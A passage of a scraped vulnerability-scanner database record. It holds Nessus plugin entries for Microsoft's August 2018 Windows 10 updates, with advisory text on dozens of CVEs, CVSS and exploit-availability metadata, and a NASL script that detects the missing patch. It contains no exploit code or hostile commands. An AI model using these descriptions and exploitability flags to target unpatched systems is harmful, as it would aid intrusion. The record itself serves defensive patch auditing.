An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8355, CVE-2018-8372, CVE-2018-8385)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when the Windows kernel fails to\n properly handle parsing of certain symbolic links. An\n attacker who successfully exploited this vulnerability\n could potentially access privileged registry keys and\n thereby elevate permissions. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8347)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows PDF Library improperly handles objects\n in memory. The vulnerability could corrupt memory in a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. If the current\n user is logged on with administrative user rights, an\n attacker could take control of an affected system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2018-8350)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2018-8345)\n\n - An information disclosure vulnerability exists when\n WebAudio Library improperly handles audio requests. An\n attacker who has successfully exploited this\n vulnerability might be able to read privileged data\n across trust boundaries. In browsing scenarios, an\n attacker could convince a user to visit a malicious site\n and leverage the vulnerability to obtain privileged\n information from the browser process, such as sensitive\n data from other opened tabs. 
An attacker could also\n inject malicious code into advertising networks used by\n trusted sites or embed malicious code on a compromised,\n but trusted, site. The update addresses the\n vulnerability by correcting how the WebAudio Library\n handles audio requests. (CVE-2018-8370)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2018-8339)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8266, CVE-2018-8381)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly validates hyperlinks before\n loading executable libraries. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8316)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. 
An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8399, CVE-2018-8404)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2018-8394, CVE-2018-8398)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8403)\n\n - An information disclosure vulnerability exists when\n affected Microsoft browsers improperly allow cross-frame\n interaction. An attacker who successfully exploited this\n vulnerability could allow an attacker to obtain browser\n frame or window state from a different domain. For an\n attack to be successful, an attacker must persuade a\n user to open a malicious website from a secure website.\n This update addresses the vulnerability by denying\n permission to read the state of the object model, to\n which frames or windows on different domains should not\n have access. (CVE-2018-8351)\n\n - An elevation of privilege vulnerability exists in\n Microsoft browsers allowing sandbox escape. An attacker\n who successfully exploited the vulnerability could use\n the sandbox escape to elevate privileges on an affected\n system. 
This vulnerability by itself does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability (such as a remote\n code execution vulnerability or another elevation of\n privilege vulnerability) that is capable of leveraging\n the elevated privileges when code execution is\n attempted. (CVE-2018-8357)\n\n - An Elevation of Privilege vulnerability exists when\n Diagnostics Hub Standard Collector allows file creation\n in arbitrary locations. (CVE-2018-0952)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8353, CVE-2018-8371, CVE-2018-8373,\n CVE-2018-8389)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8377)\n\n - An information disclosure vulnerability exists in\n Microsoft .NET Framework that could allow an attacker to\n access information in multi-tenant environments. The\n vulnerability is caused when .NET Framework is used in\n high-load/high-density network connections where content\n from one stream can blend into another stream.\n (CVE-2018-8360)\n\n - A spoofing vulnerability exists when Microsoft Edge\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was on a\n legitimate website. 
The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services.\n (CVE-2018-8388)", "edition": 29, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-08-14T00:00:00", "title": "KB4343897: Windows 10 Version 1709 And Windows Server Version 1709 August 2018 Security Update (Foreshadow)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8401", "CVE-2018-0952", "CVE-2018-8200", "CVE-2018-8343", "CVE-2018-8406", "CVE-2018-8345", "CVE-2018-8351", "CVE-2018-8377", "CVE-2018-8403", "CVE-2018-8372", "CVE-2018-8388", "CVE-2018-8405", "CVE-2018-8339", "CVE-2018-8344", "CVE-2018-8400", "CVE-2018-8355", "CVE-2018-8350", "CVE-2018-8394", "CVE-2018-3646", "CVE-2018-8316", "CVE-2018-8373", "CVE-2018-8357", "CVE-2018-8390", "CVE-2018-8266", "CVE-2018-3620", "CVE-2018-8404", "CVE-2018-8399", "CVE-2018-3615", "CVE-2018-8348", "CVE-2018-8370", "CVE-2018-8341", "CVE-2018-8204", "CVE-2018-8414", "CVE-2018-8347", "CVE-2018-8385", "CVE-2018-8381", "CVE-2018-8371", "CVE-2018-8360", "CVE-2018-8389", "CVE-2018-8398", "CVE-2018-8353", "CVE-2018-8349"], "modified": "2018-08-14T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS18_AUG_4343897.NASL", "href": "https://www.tenable.com/plugins/nessus/111687", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111687);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\n \"CVE-2018-3615\",\n \"CVE-2018-3620\",\n \"CVE-2018-3646\",\n \"CVE-2018-0952\",\n \"CVE-2018-8200\",\n \"CVE-2018-8204\",\n \"CVE-2018-8266\",\n \"CVE-2018-8316\",\n \"CVE-2018-8339\",\n \"CVE-2018-8341\",\n \"CVE-2018-8343\",\n \"CVE-2018-8344\",\n \"CVE-2018-8345\",\n \"CVE-2018-8347\",\n \"CVE-2018-8348\",\n \"CVE-2018-8349\",\n \"CVE-2018-8350\",\n \"CVE-2018-8351\",\n \"CVE-2018-8353\",\n \"CVE-2018-8355\",\n \"CVE-2018-8357\",\n \"CVE-2018-8360\",\n \"CVE-2018-8370\",\n \"CVE-2018-8371\",\n \"CVE-2018-8372\",\n \"CVE-2018-8373\",\n \"CVE-2018-8377\",\n \"CVE-2018-8381\",\n \"CVE-2018-8385\",\n \"CVE-2018-8388\",\n \"CVE-2018-8389\",\n \"CVE-2018-8390\",\n \"CVE-2018-8394\",\n \"CVE-2018-8398\",\n \"CVE-2018-8399\",\n \"CVE-2018-8400\",\n \"CVE-2018-8401\",\n \"CVE-2018-8403\",\n \"CVE-2018-8404\",\n \"CVE-2018-8405\",\n \"CVE-2018-8406\",\n \"CVE-2018-8414\"\n );\n script_bugtraq_id(\n 104977,\n 104978,\n 104980,\n 104982,\n 104983,\n 104984,\n 104985,\n 104986,\n 104987,\n 104988,\n 104992,\n 104995,\n 104998,\n 104999,\n 105001,\n 105005,\n 105006,\n 105007,\n 105008,\n 105011,\n 105012,\n 105016,\n 105027,\n 105030,\n 105041,\n 105048\n );\n script_xref(name:\"MSKB\", value:\"4343897\");\n script_xref(name:\"MSFT\", value:\"MS18-4343897\");\n\n script_name(english:\"KB4343897: Windows 10 Version 1709 And Windows Server Version 1709 August 2018 Security Update (Foreshadow)\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4343897.\nIt is, therefore, 
affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8341, CVE-2018-8348)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8344)\n\n - An elevation of privilege vulnerability exists in the\n Network Driver Interface Specification (NDIS) when\n ndis.sys fails to check the length of a buffer prior to\n copying memory to it. (CVE-2018-8343)\n\n - A remote code execution vulnerability exists in\n "Microsoft COM for Windows" when it fails to\n properly handle serialized objects. An attacker who\n successfully exploited the vulnerability could use a\n specially crafted file or script to perform actions. In\n an email attack scenario, an attacker could exploit the\n vulnerability by sending the specially crafted file to\n the user and convincing the user to open the file.\n (CVE-2018-8349)\n\n - An elevation of privilege vulnerability exists when the\n DirectX Graphics Kernel (DXGKRNL) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8400, CVE-2018-8401,\n CVE-2018-8405, CVE-2018-8406)\n\n - A remote code execution vulnerability exists in the way\n that the ChakraCore scripting engine handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that an attacker could execute arbitrary code in the\n context of the current user. 
An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8390)\n\n - A remote code execution vulnerability exists when the\n Windows Shell does not properly validate file paths. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in the context of the current\n user. If the current user is logged on as an\n administrator, an attacker could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with elevated privileges. Users whose accounts\n are configured to have fewer privileges on the system\n could be less impacted than users who operate with\n administrative privileges. (CVE-2018-8414)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8200, CVE-2018-8204)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8355, CVE-2018-8372, CVE-2018-8385)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when the Windows kernel fails to\n properly handle parsing of certain symbolic links. An\n attacker who successfully exploited this vulnerability\n could potentially access privileged registry keys and\n thereby elevate permissions. 
An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8347)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows PDF Library improperly handles objects\n in memory. The vulnerability could corrupt memory in a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. If the current\n user is logged on with administrative user rights, an\n attacker could take control of an affected system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2018-8350)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2018-8345)\n\n - An information disclosure vulnerability exists when\n WebAudio Library improperly handles audio requests. An\n attacker who has successfully exploited this\n vulnerability might be able to read privileged data\n across trust boundaries. In browsing scenarios, an\n attacker could convince a user to visit a malicious site\n and leverage the vulnerability to obtain privileged\n information from the browser process, such as sensitive\n data from other opened tabs. An attacker could also\n inject malicious code into advertising networks used by\n trusted sites or embed malicious code on a compromised,\n but trusted, site. The update addresses the\n vulnerability by correcting how the WebAudio Library\n handles audio requests. 
(CVE-2018-8370)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2018-8339)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8266, CVE-2018-8381)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly validates hyperlinks before\n loading executable libraries. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8316)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8399, CVE-2018-8404)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. 
An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2018-8394, CVE-2018-8398)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8403)\n\n - An information disclosure vulnerability exists when\n affected Microsoft browsers improperly allow cross-frame\n interaction. An attacker who successfully exploited this\n vulnerability could allow an attacker to obtain browser\n frame or window state from a different domain. For an\n attack to be successful, an attacker must persuade a\n user to open a malicious website from a secure website.\n This update addresses the vulnerability by denying\n permission to read the state of the object model, to\n which frames or windows on different domains should not\n have access. (CVE-2018-8351)\n\n - An elevation of privilege vulnerability exists in\n Microsoft browsers allowing sandbox escape. An attacker\n who successfully exploited the vulnerability could use\n the sandbox escape to elevate privileges on an affected\n system. 
This vulnerability by itself does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability (such as a remote\n code execution vulnerability or another elevation of\n privilege vulnerability) that is capable of leveraging\n the elevated privileges when code execution is\n attempted. (CVE-2018-8357)\n\n - An Elevation of Privilege vulnerability exists when\n Diagnostics Hub Standard Collector allows file creation\n in arbitrary locations. (CVE-2018-0952)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8353, CVE-2018-8371, CVE-2018-8373,\n CVE-2018-8389)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8377)\n\n - An information disclosure vulnerability exists in\n Microsoft .NET Framework that could allow an attacker to\n access information in multi-tenant environments. The\n vulnerability is caused when .NET Framework is used in\n high-load/high-density network connections where content\n from one stream can blend into another stream.\n (CVE-2018-8360)\n\n - A spoofing vulnerability exists when Microsoft Edge\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was on a\n legitimate website. 
The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services.\n (CVE-2018-8388)\");\n # https://support.microsoft.com/en-us/help/4343897/windows-10-update-kb4343897\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?770b7995\");\n # https://support.microsoft.com/en-us/help/4072698/windows-server-speculative-execution-side-channel-vulnerabilities-prot\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8902cebb\");\n script_set_attribute(attribute:\"solution\", value:\n \"Apply Cumulative Update KB4343897 as well as refer to the KB article for additional information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8344\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", 'microsoft_windows_env_vars.nasl');\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smb_reg_query.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS18-08\";\nkbs = make_list('4343897');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"16299\",\n rollup_date:\"08_2018\",\n bulletin:bulletin,\n rollup_kb_list:[4343897])\n )\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-19T05:12:51", "description": "The remote Windows host is missing security update 4343885.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure 
vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8341, CVE-2018-8348)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8344)\n\n - An elevation of privilege vulnerability exists in the\n Network Driver Interface Specification (NDIS) when\n ndis.sys fails to check the length of a buffer prior to\n copying memory to it. (CVE-2018-8343)\n\n - A remote code execution vulnerability exists in\n "Microsoft COM for Windows" when it fails to\n properly handle serialized objects. An attacker who\n successfully exploited the vulnerability could use a\n specially crafted file or script to perform actions. In\n an email attack scenario, an attacker could exploit the\n vulnerability by sending the specially crafted file to\n the user and convincing the user to open the file.\n (CVE-2018-8349)\n\n - A remote code execution vulnerability exists in the way\n that the ChakraCore scripting engine handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8390)\n\n - A remote code execution vulnerability exists when the\n Windows Shell does not properly validate file paths. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in the context of the current\n user. 
If the current user is logged on as an\n administrator, an attacker could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with elevated privileges. Users whose accounts\n are configured to have fewer privileges on the system\n could be less impacted than users who operate with\n administrative privileges. (CVE-2018-8414)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8200, CVE-2018-8204)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8355, CVE-2018-8372, CVE-2018-8385)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when the Windows kernel fails to\n properly handle parsing of certain symbolic links. An\n attacker who successfully exploited this vulnerability\n could potentially access privileged registry keys and\n thereby elevate permissions. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8347)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows PDF Library improperly handles objects\n in memory. The vulnerability could corrupt memory in a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. 
An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. If the current\n user is logged on with administrative user rights, an\n attacker could take control of an affected system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2018-8350)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2018-8345)\n\n - A information disclosure vulnerability exists when\n WebAudio Library improperly handles audio requests. An\n attacker who has successfully exploited this\n vulnerability might be able to read privileged data\n across trust boundaries. In browsing scenarios, an\n attacker could convince a user to visit a malicious site\n and leverage the vulnerability to obtain privileged\n information from the browser process, such as sensitive\n data from other opened tabs. An attacker could also\n inject malicious code into advertising networks used by\n trusted sites or embed malicious code on a compromised,\n but trusted, site. The update addresses the\n vulnerability by correcting how the WebAudio Library\n handles audio requests. (CVE-2018-8370)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. 
(CVE-2018-8339)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8266, CVE-2018-8381)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly validates hyperlinks before\n loading executable libraries. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8316)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8399, CVE-2018-8404)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2018-8394, CVE-2018-8398)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. 
The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8403)\n\n - An information disclosure vulnerability exists when\n affected Microsoft browsers improperly allow cross-frame\n interaction. An attacker who successfully exploited this\n vulnerability could allow an attacker to obtain browser\n frame or window state from a different domain. For an\n attack to be successful, an attacker must persuade a\n user to open a malicious website from a secure website.\n This update addresses the vulnerability by denying\n permission to read the state of the object model, to\n which frames or windows on different domains should not\n have access. (CVE-2018-8351)\n\n - An elevation of privilege vulnerability exists in\n Microsoft browsers allowing sandbox escape. An attacker\n who successfully exploited the vulnerability could use\n the sandbox escape to elevate privileges on an affected\n system. This vulnerability by itself does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability (such as a remote\n code execution vulnerability or another elevation of\n privilege vulnerability) that is capable of leveraging\n the elevated privileges when code execution is\n attempted. (CVE-2018-8357)\n\n - An Elevation of Privilege vulnerability exists when\n Diagnostics Hub Standard Collector allows file creation\n in arbitrary locations. (CVE-2018-0952)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. 
An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8353, CVE-2018-8371, CVE-2018-8373,\n CVE-2018-8389)\n\n - An elevation of privilege vulnerability exists when the\n DirectX Graphics Kernel (DXGKRNL) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8401, CVE-2018-8405,\n CVE-2018-8406)\n\n - An information disclosure vulnerability exists in\n Microsoft .NET Framework that could allow an attacker to\n access information in multi-tenant environments. The\n vulnerability is caused when .NET Framework is used in\n high-load/high-density network connections where content\n from one stream can blend into another stream.\n (CVE-2018-8360)\n\n - A spoofing vulnerability exists when Microsoft Edge\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was on a\n legitimate website. 
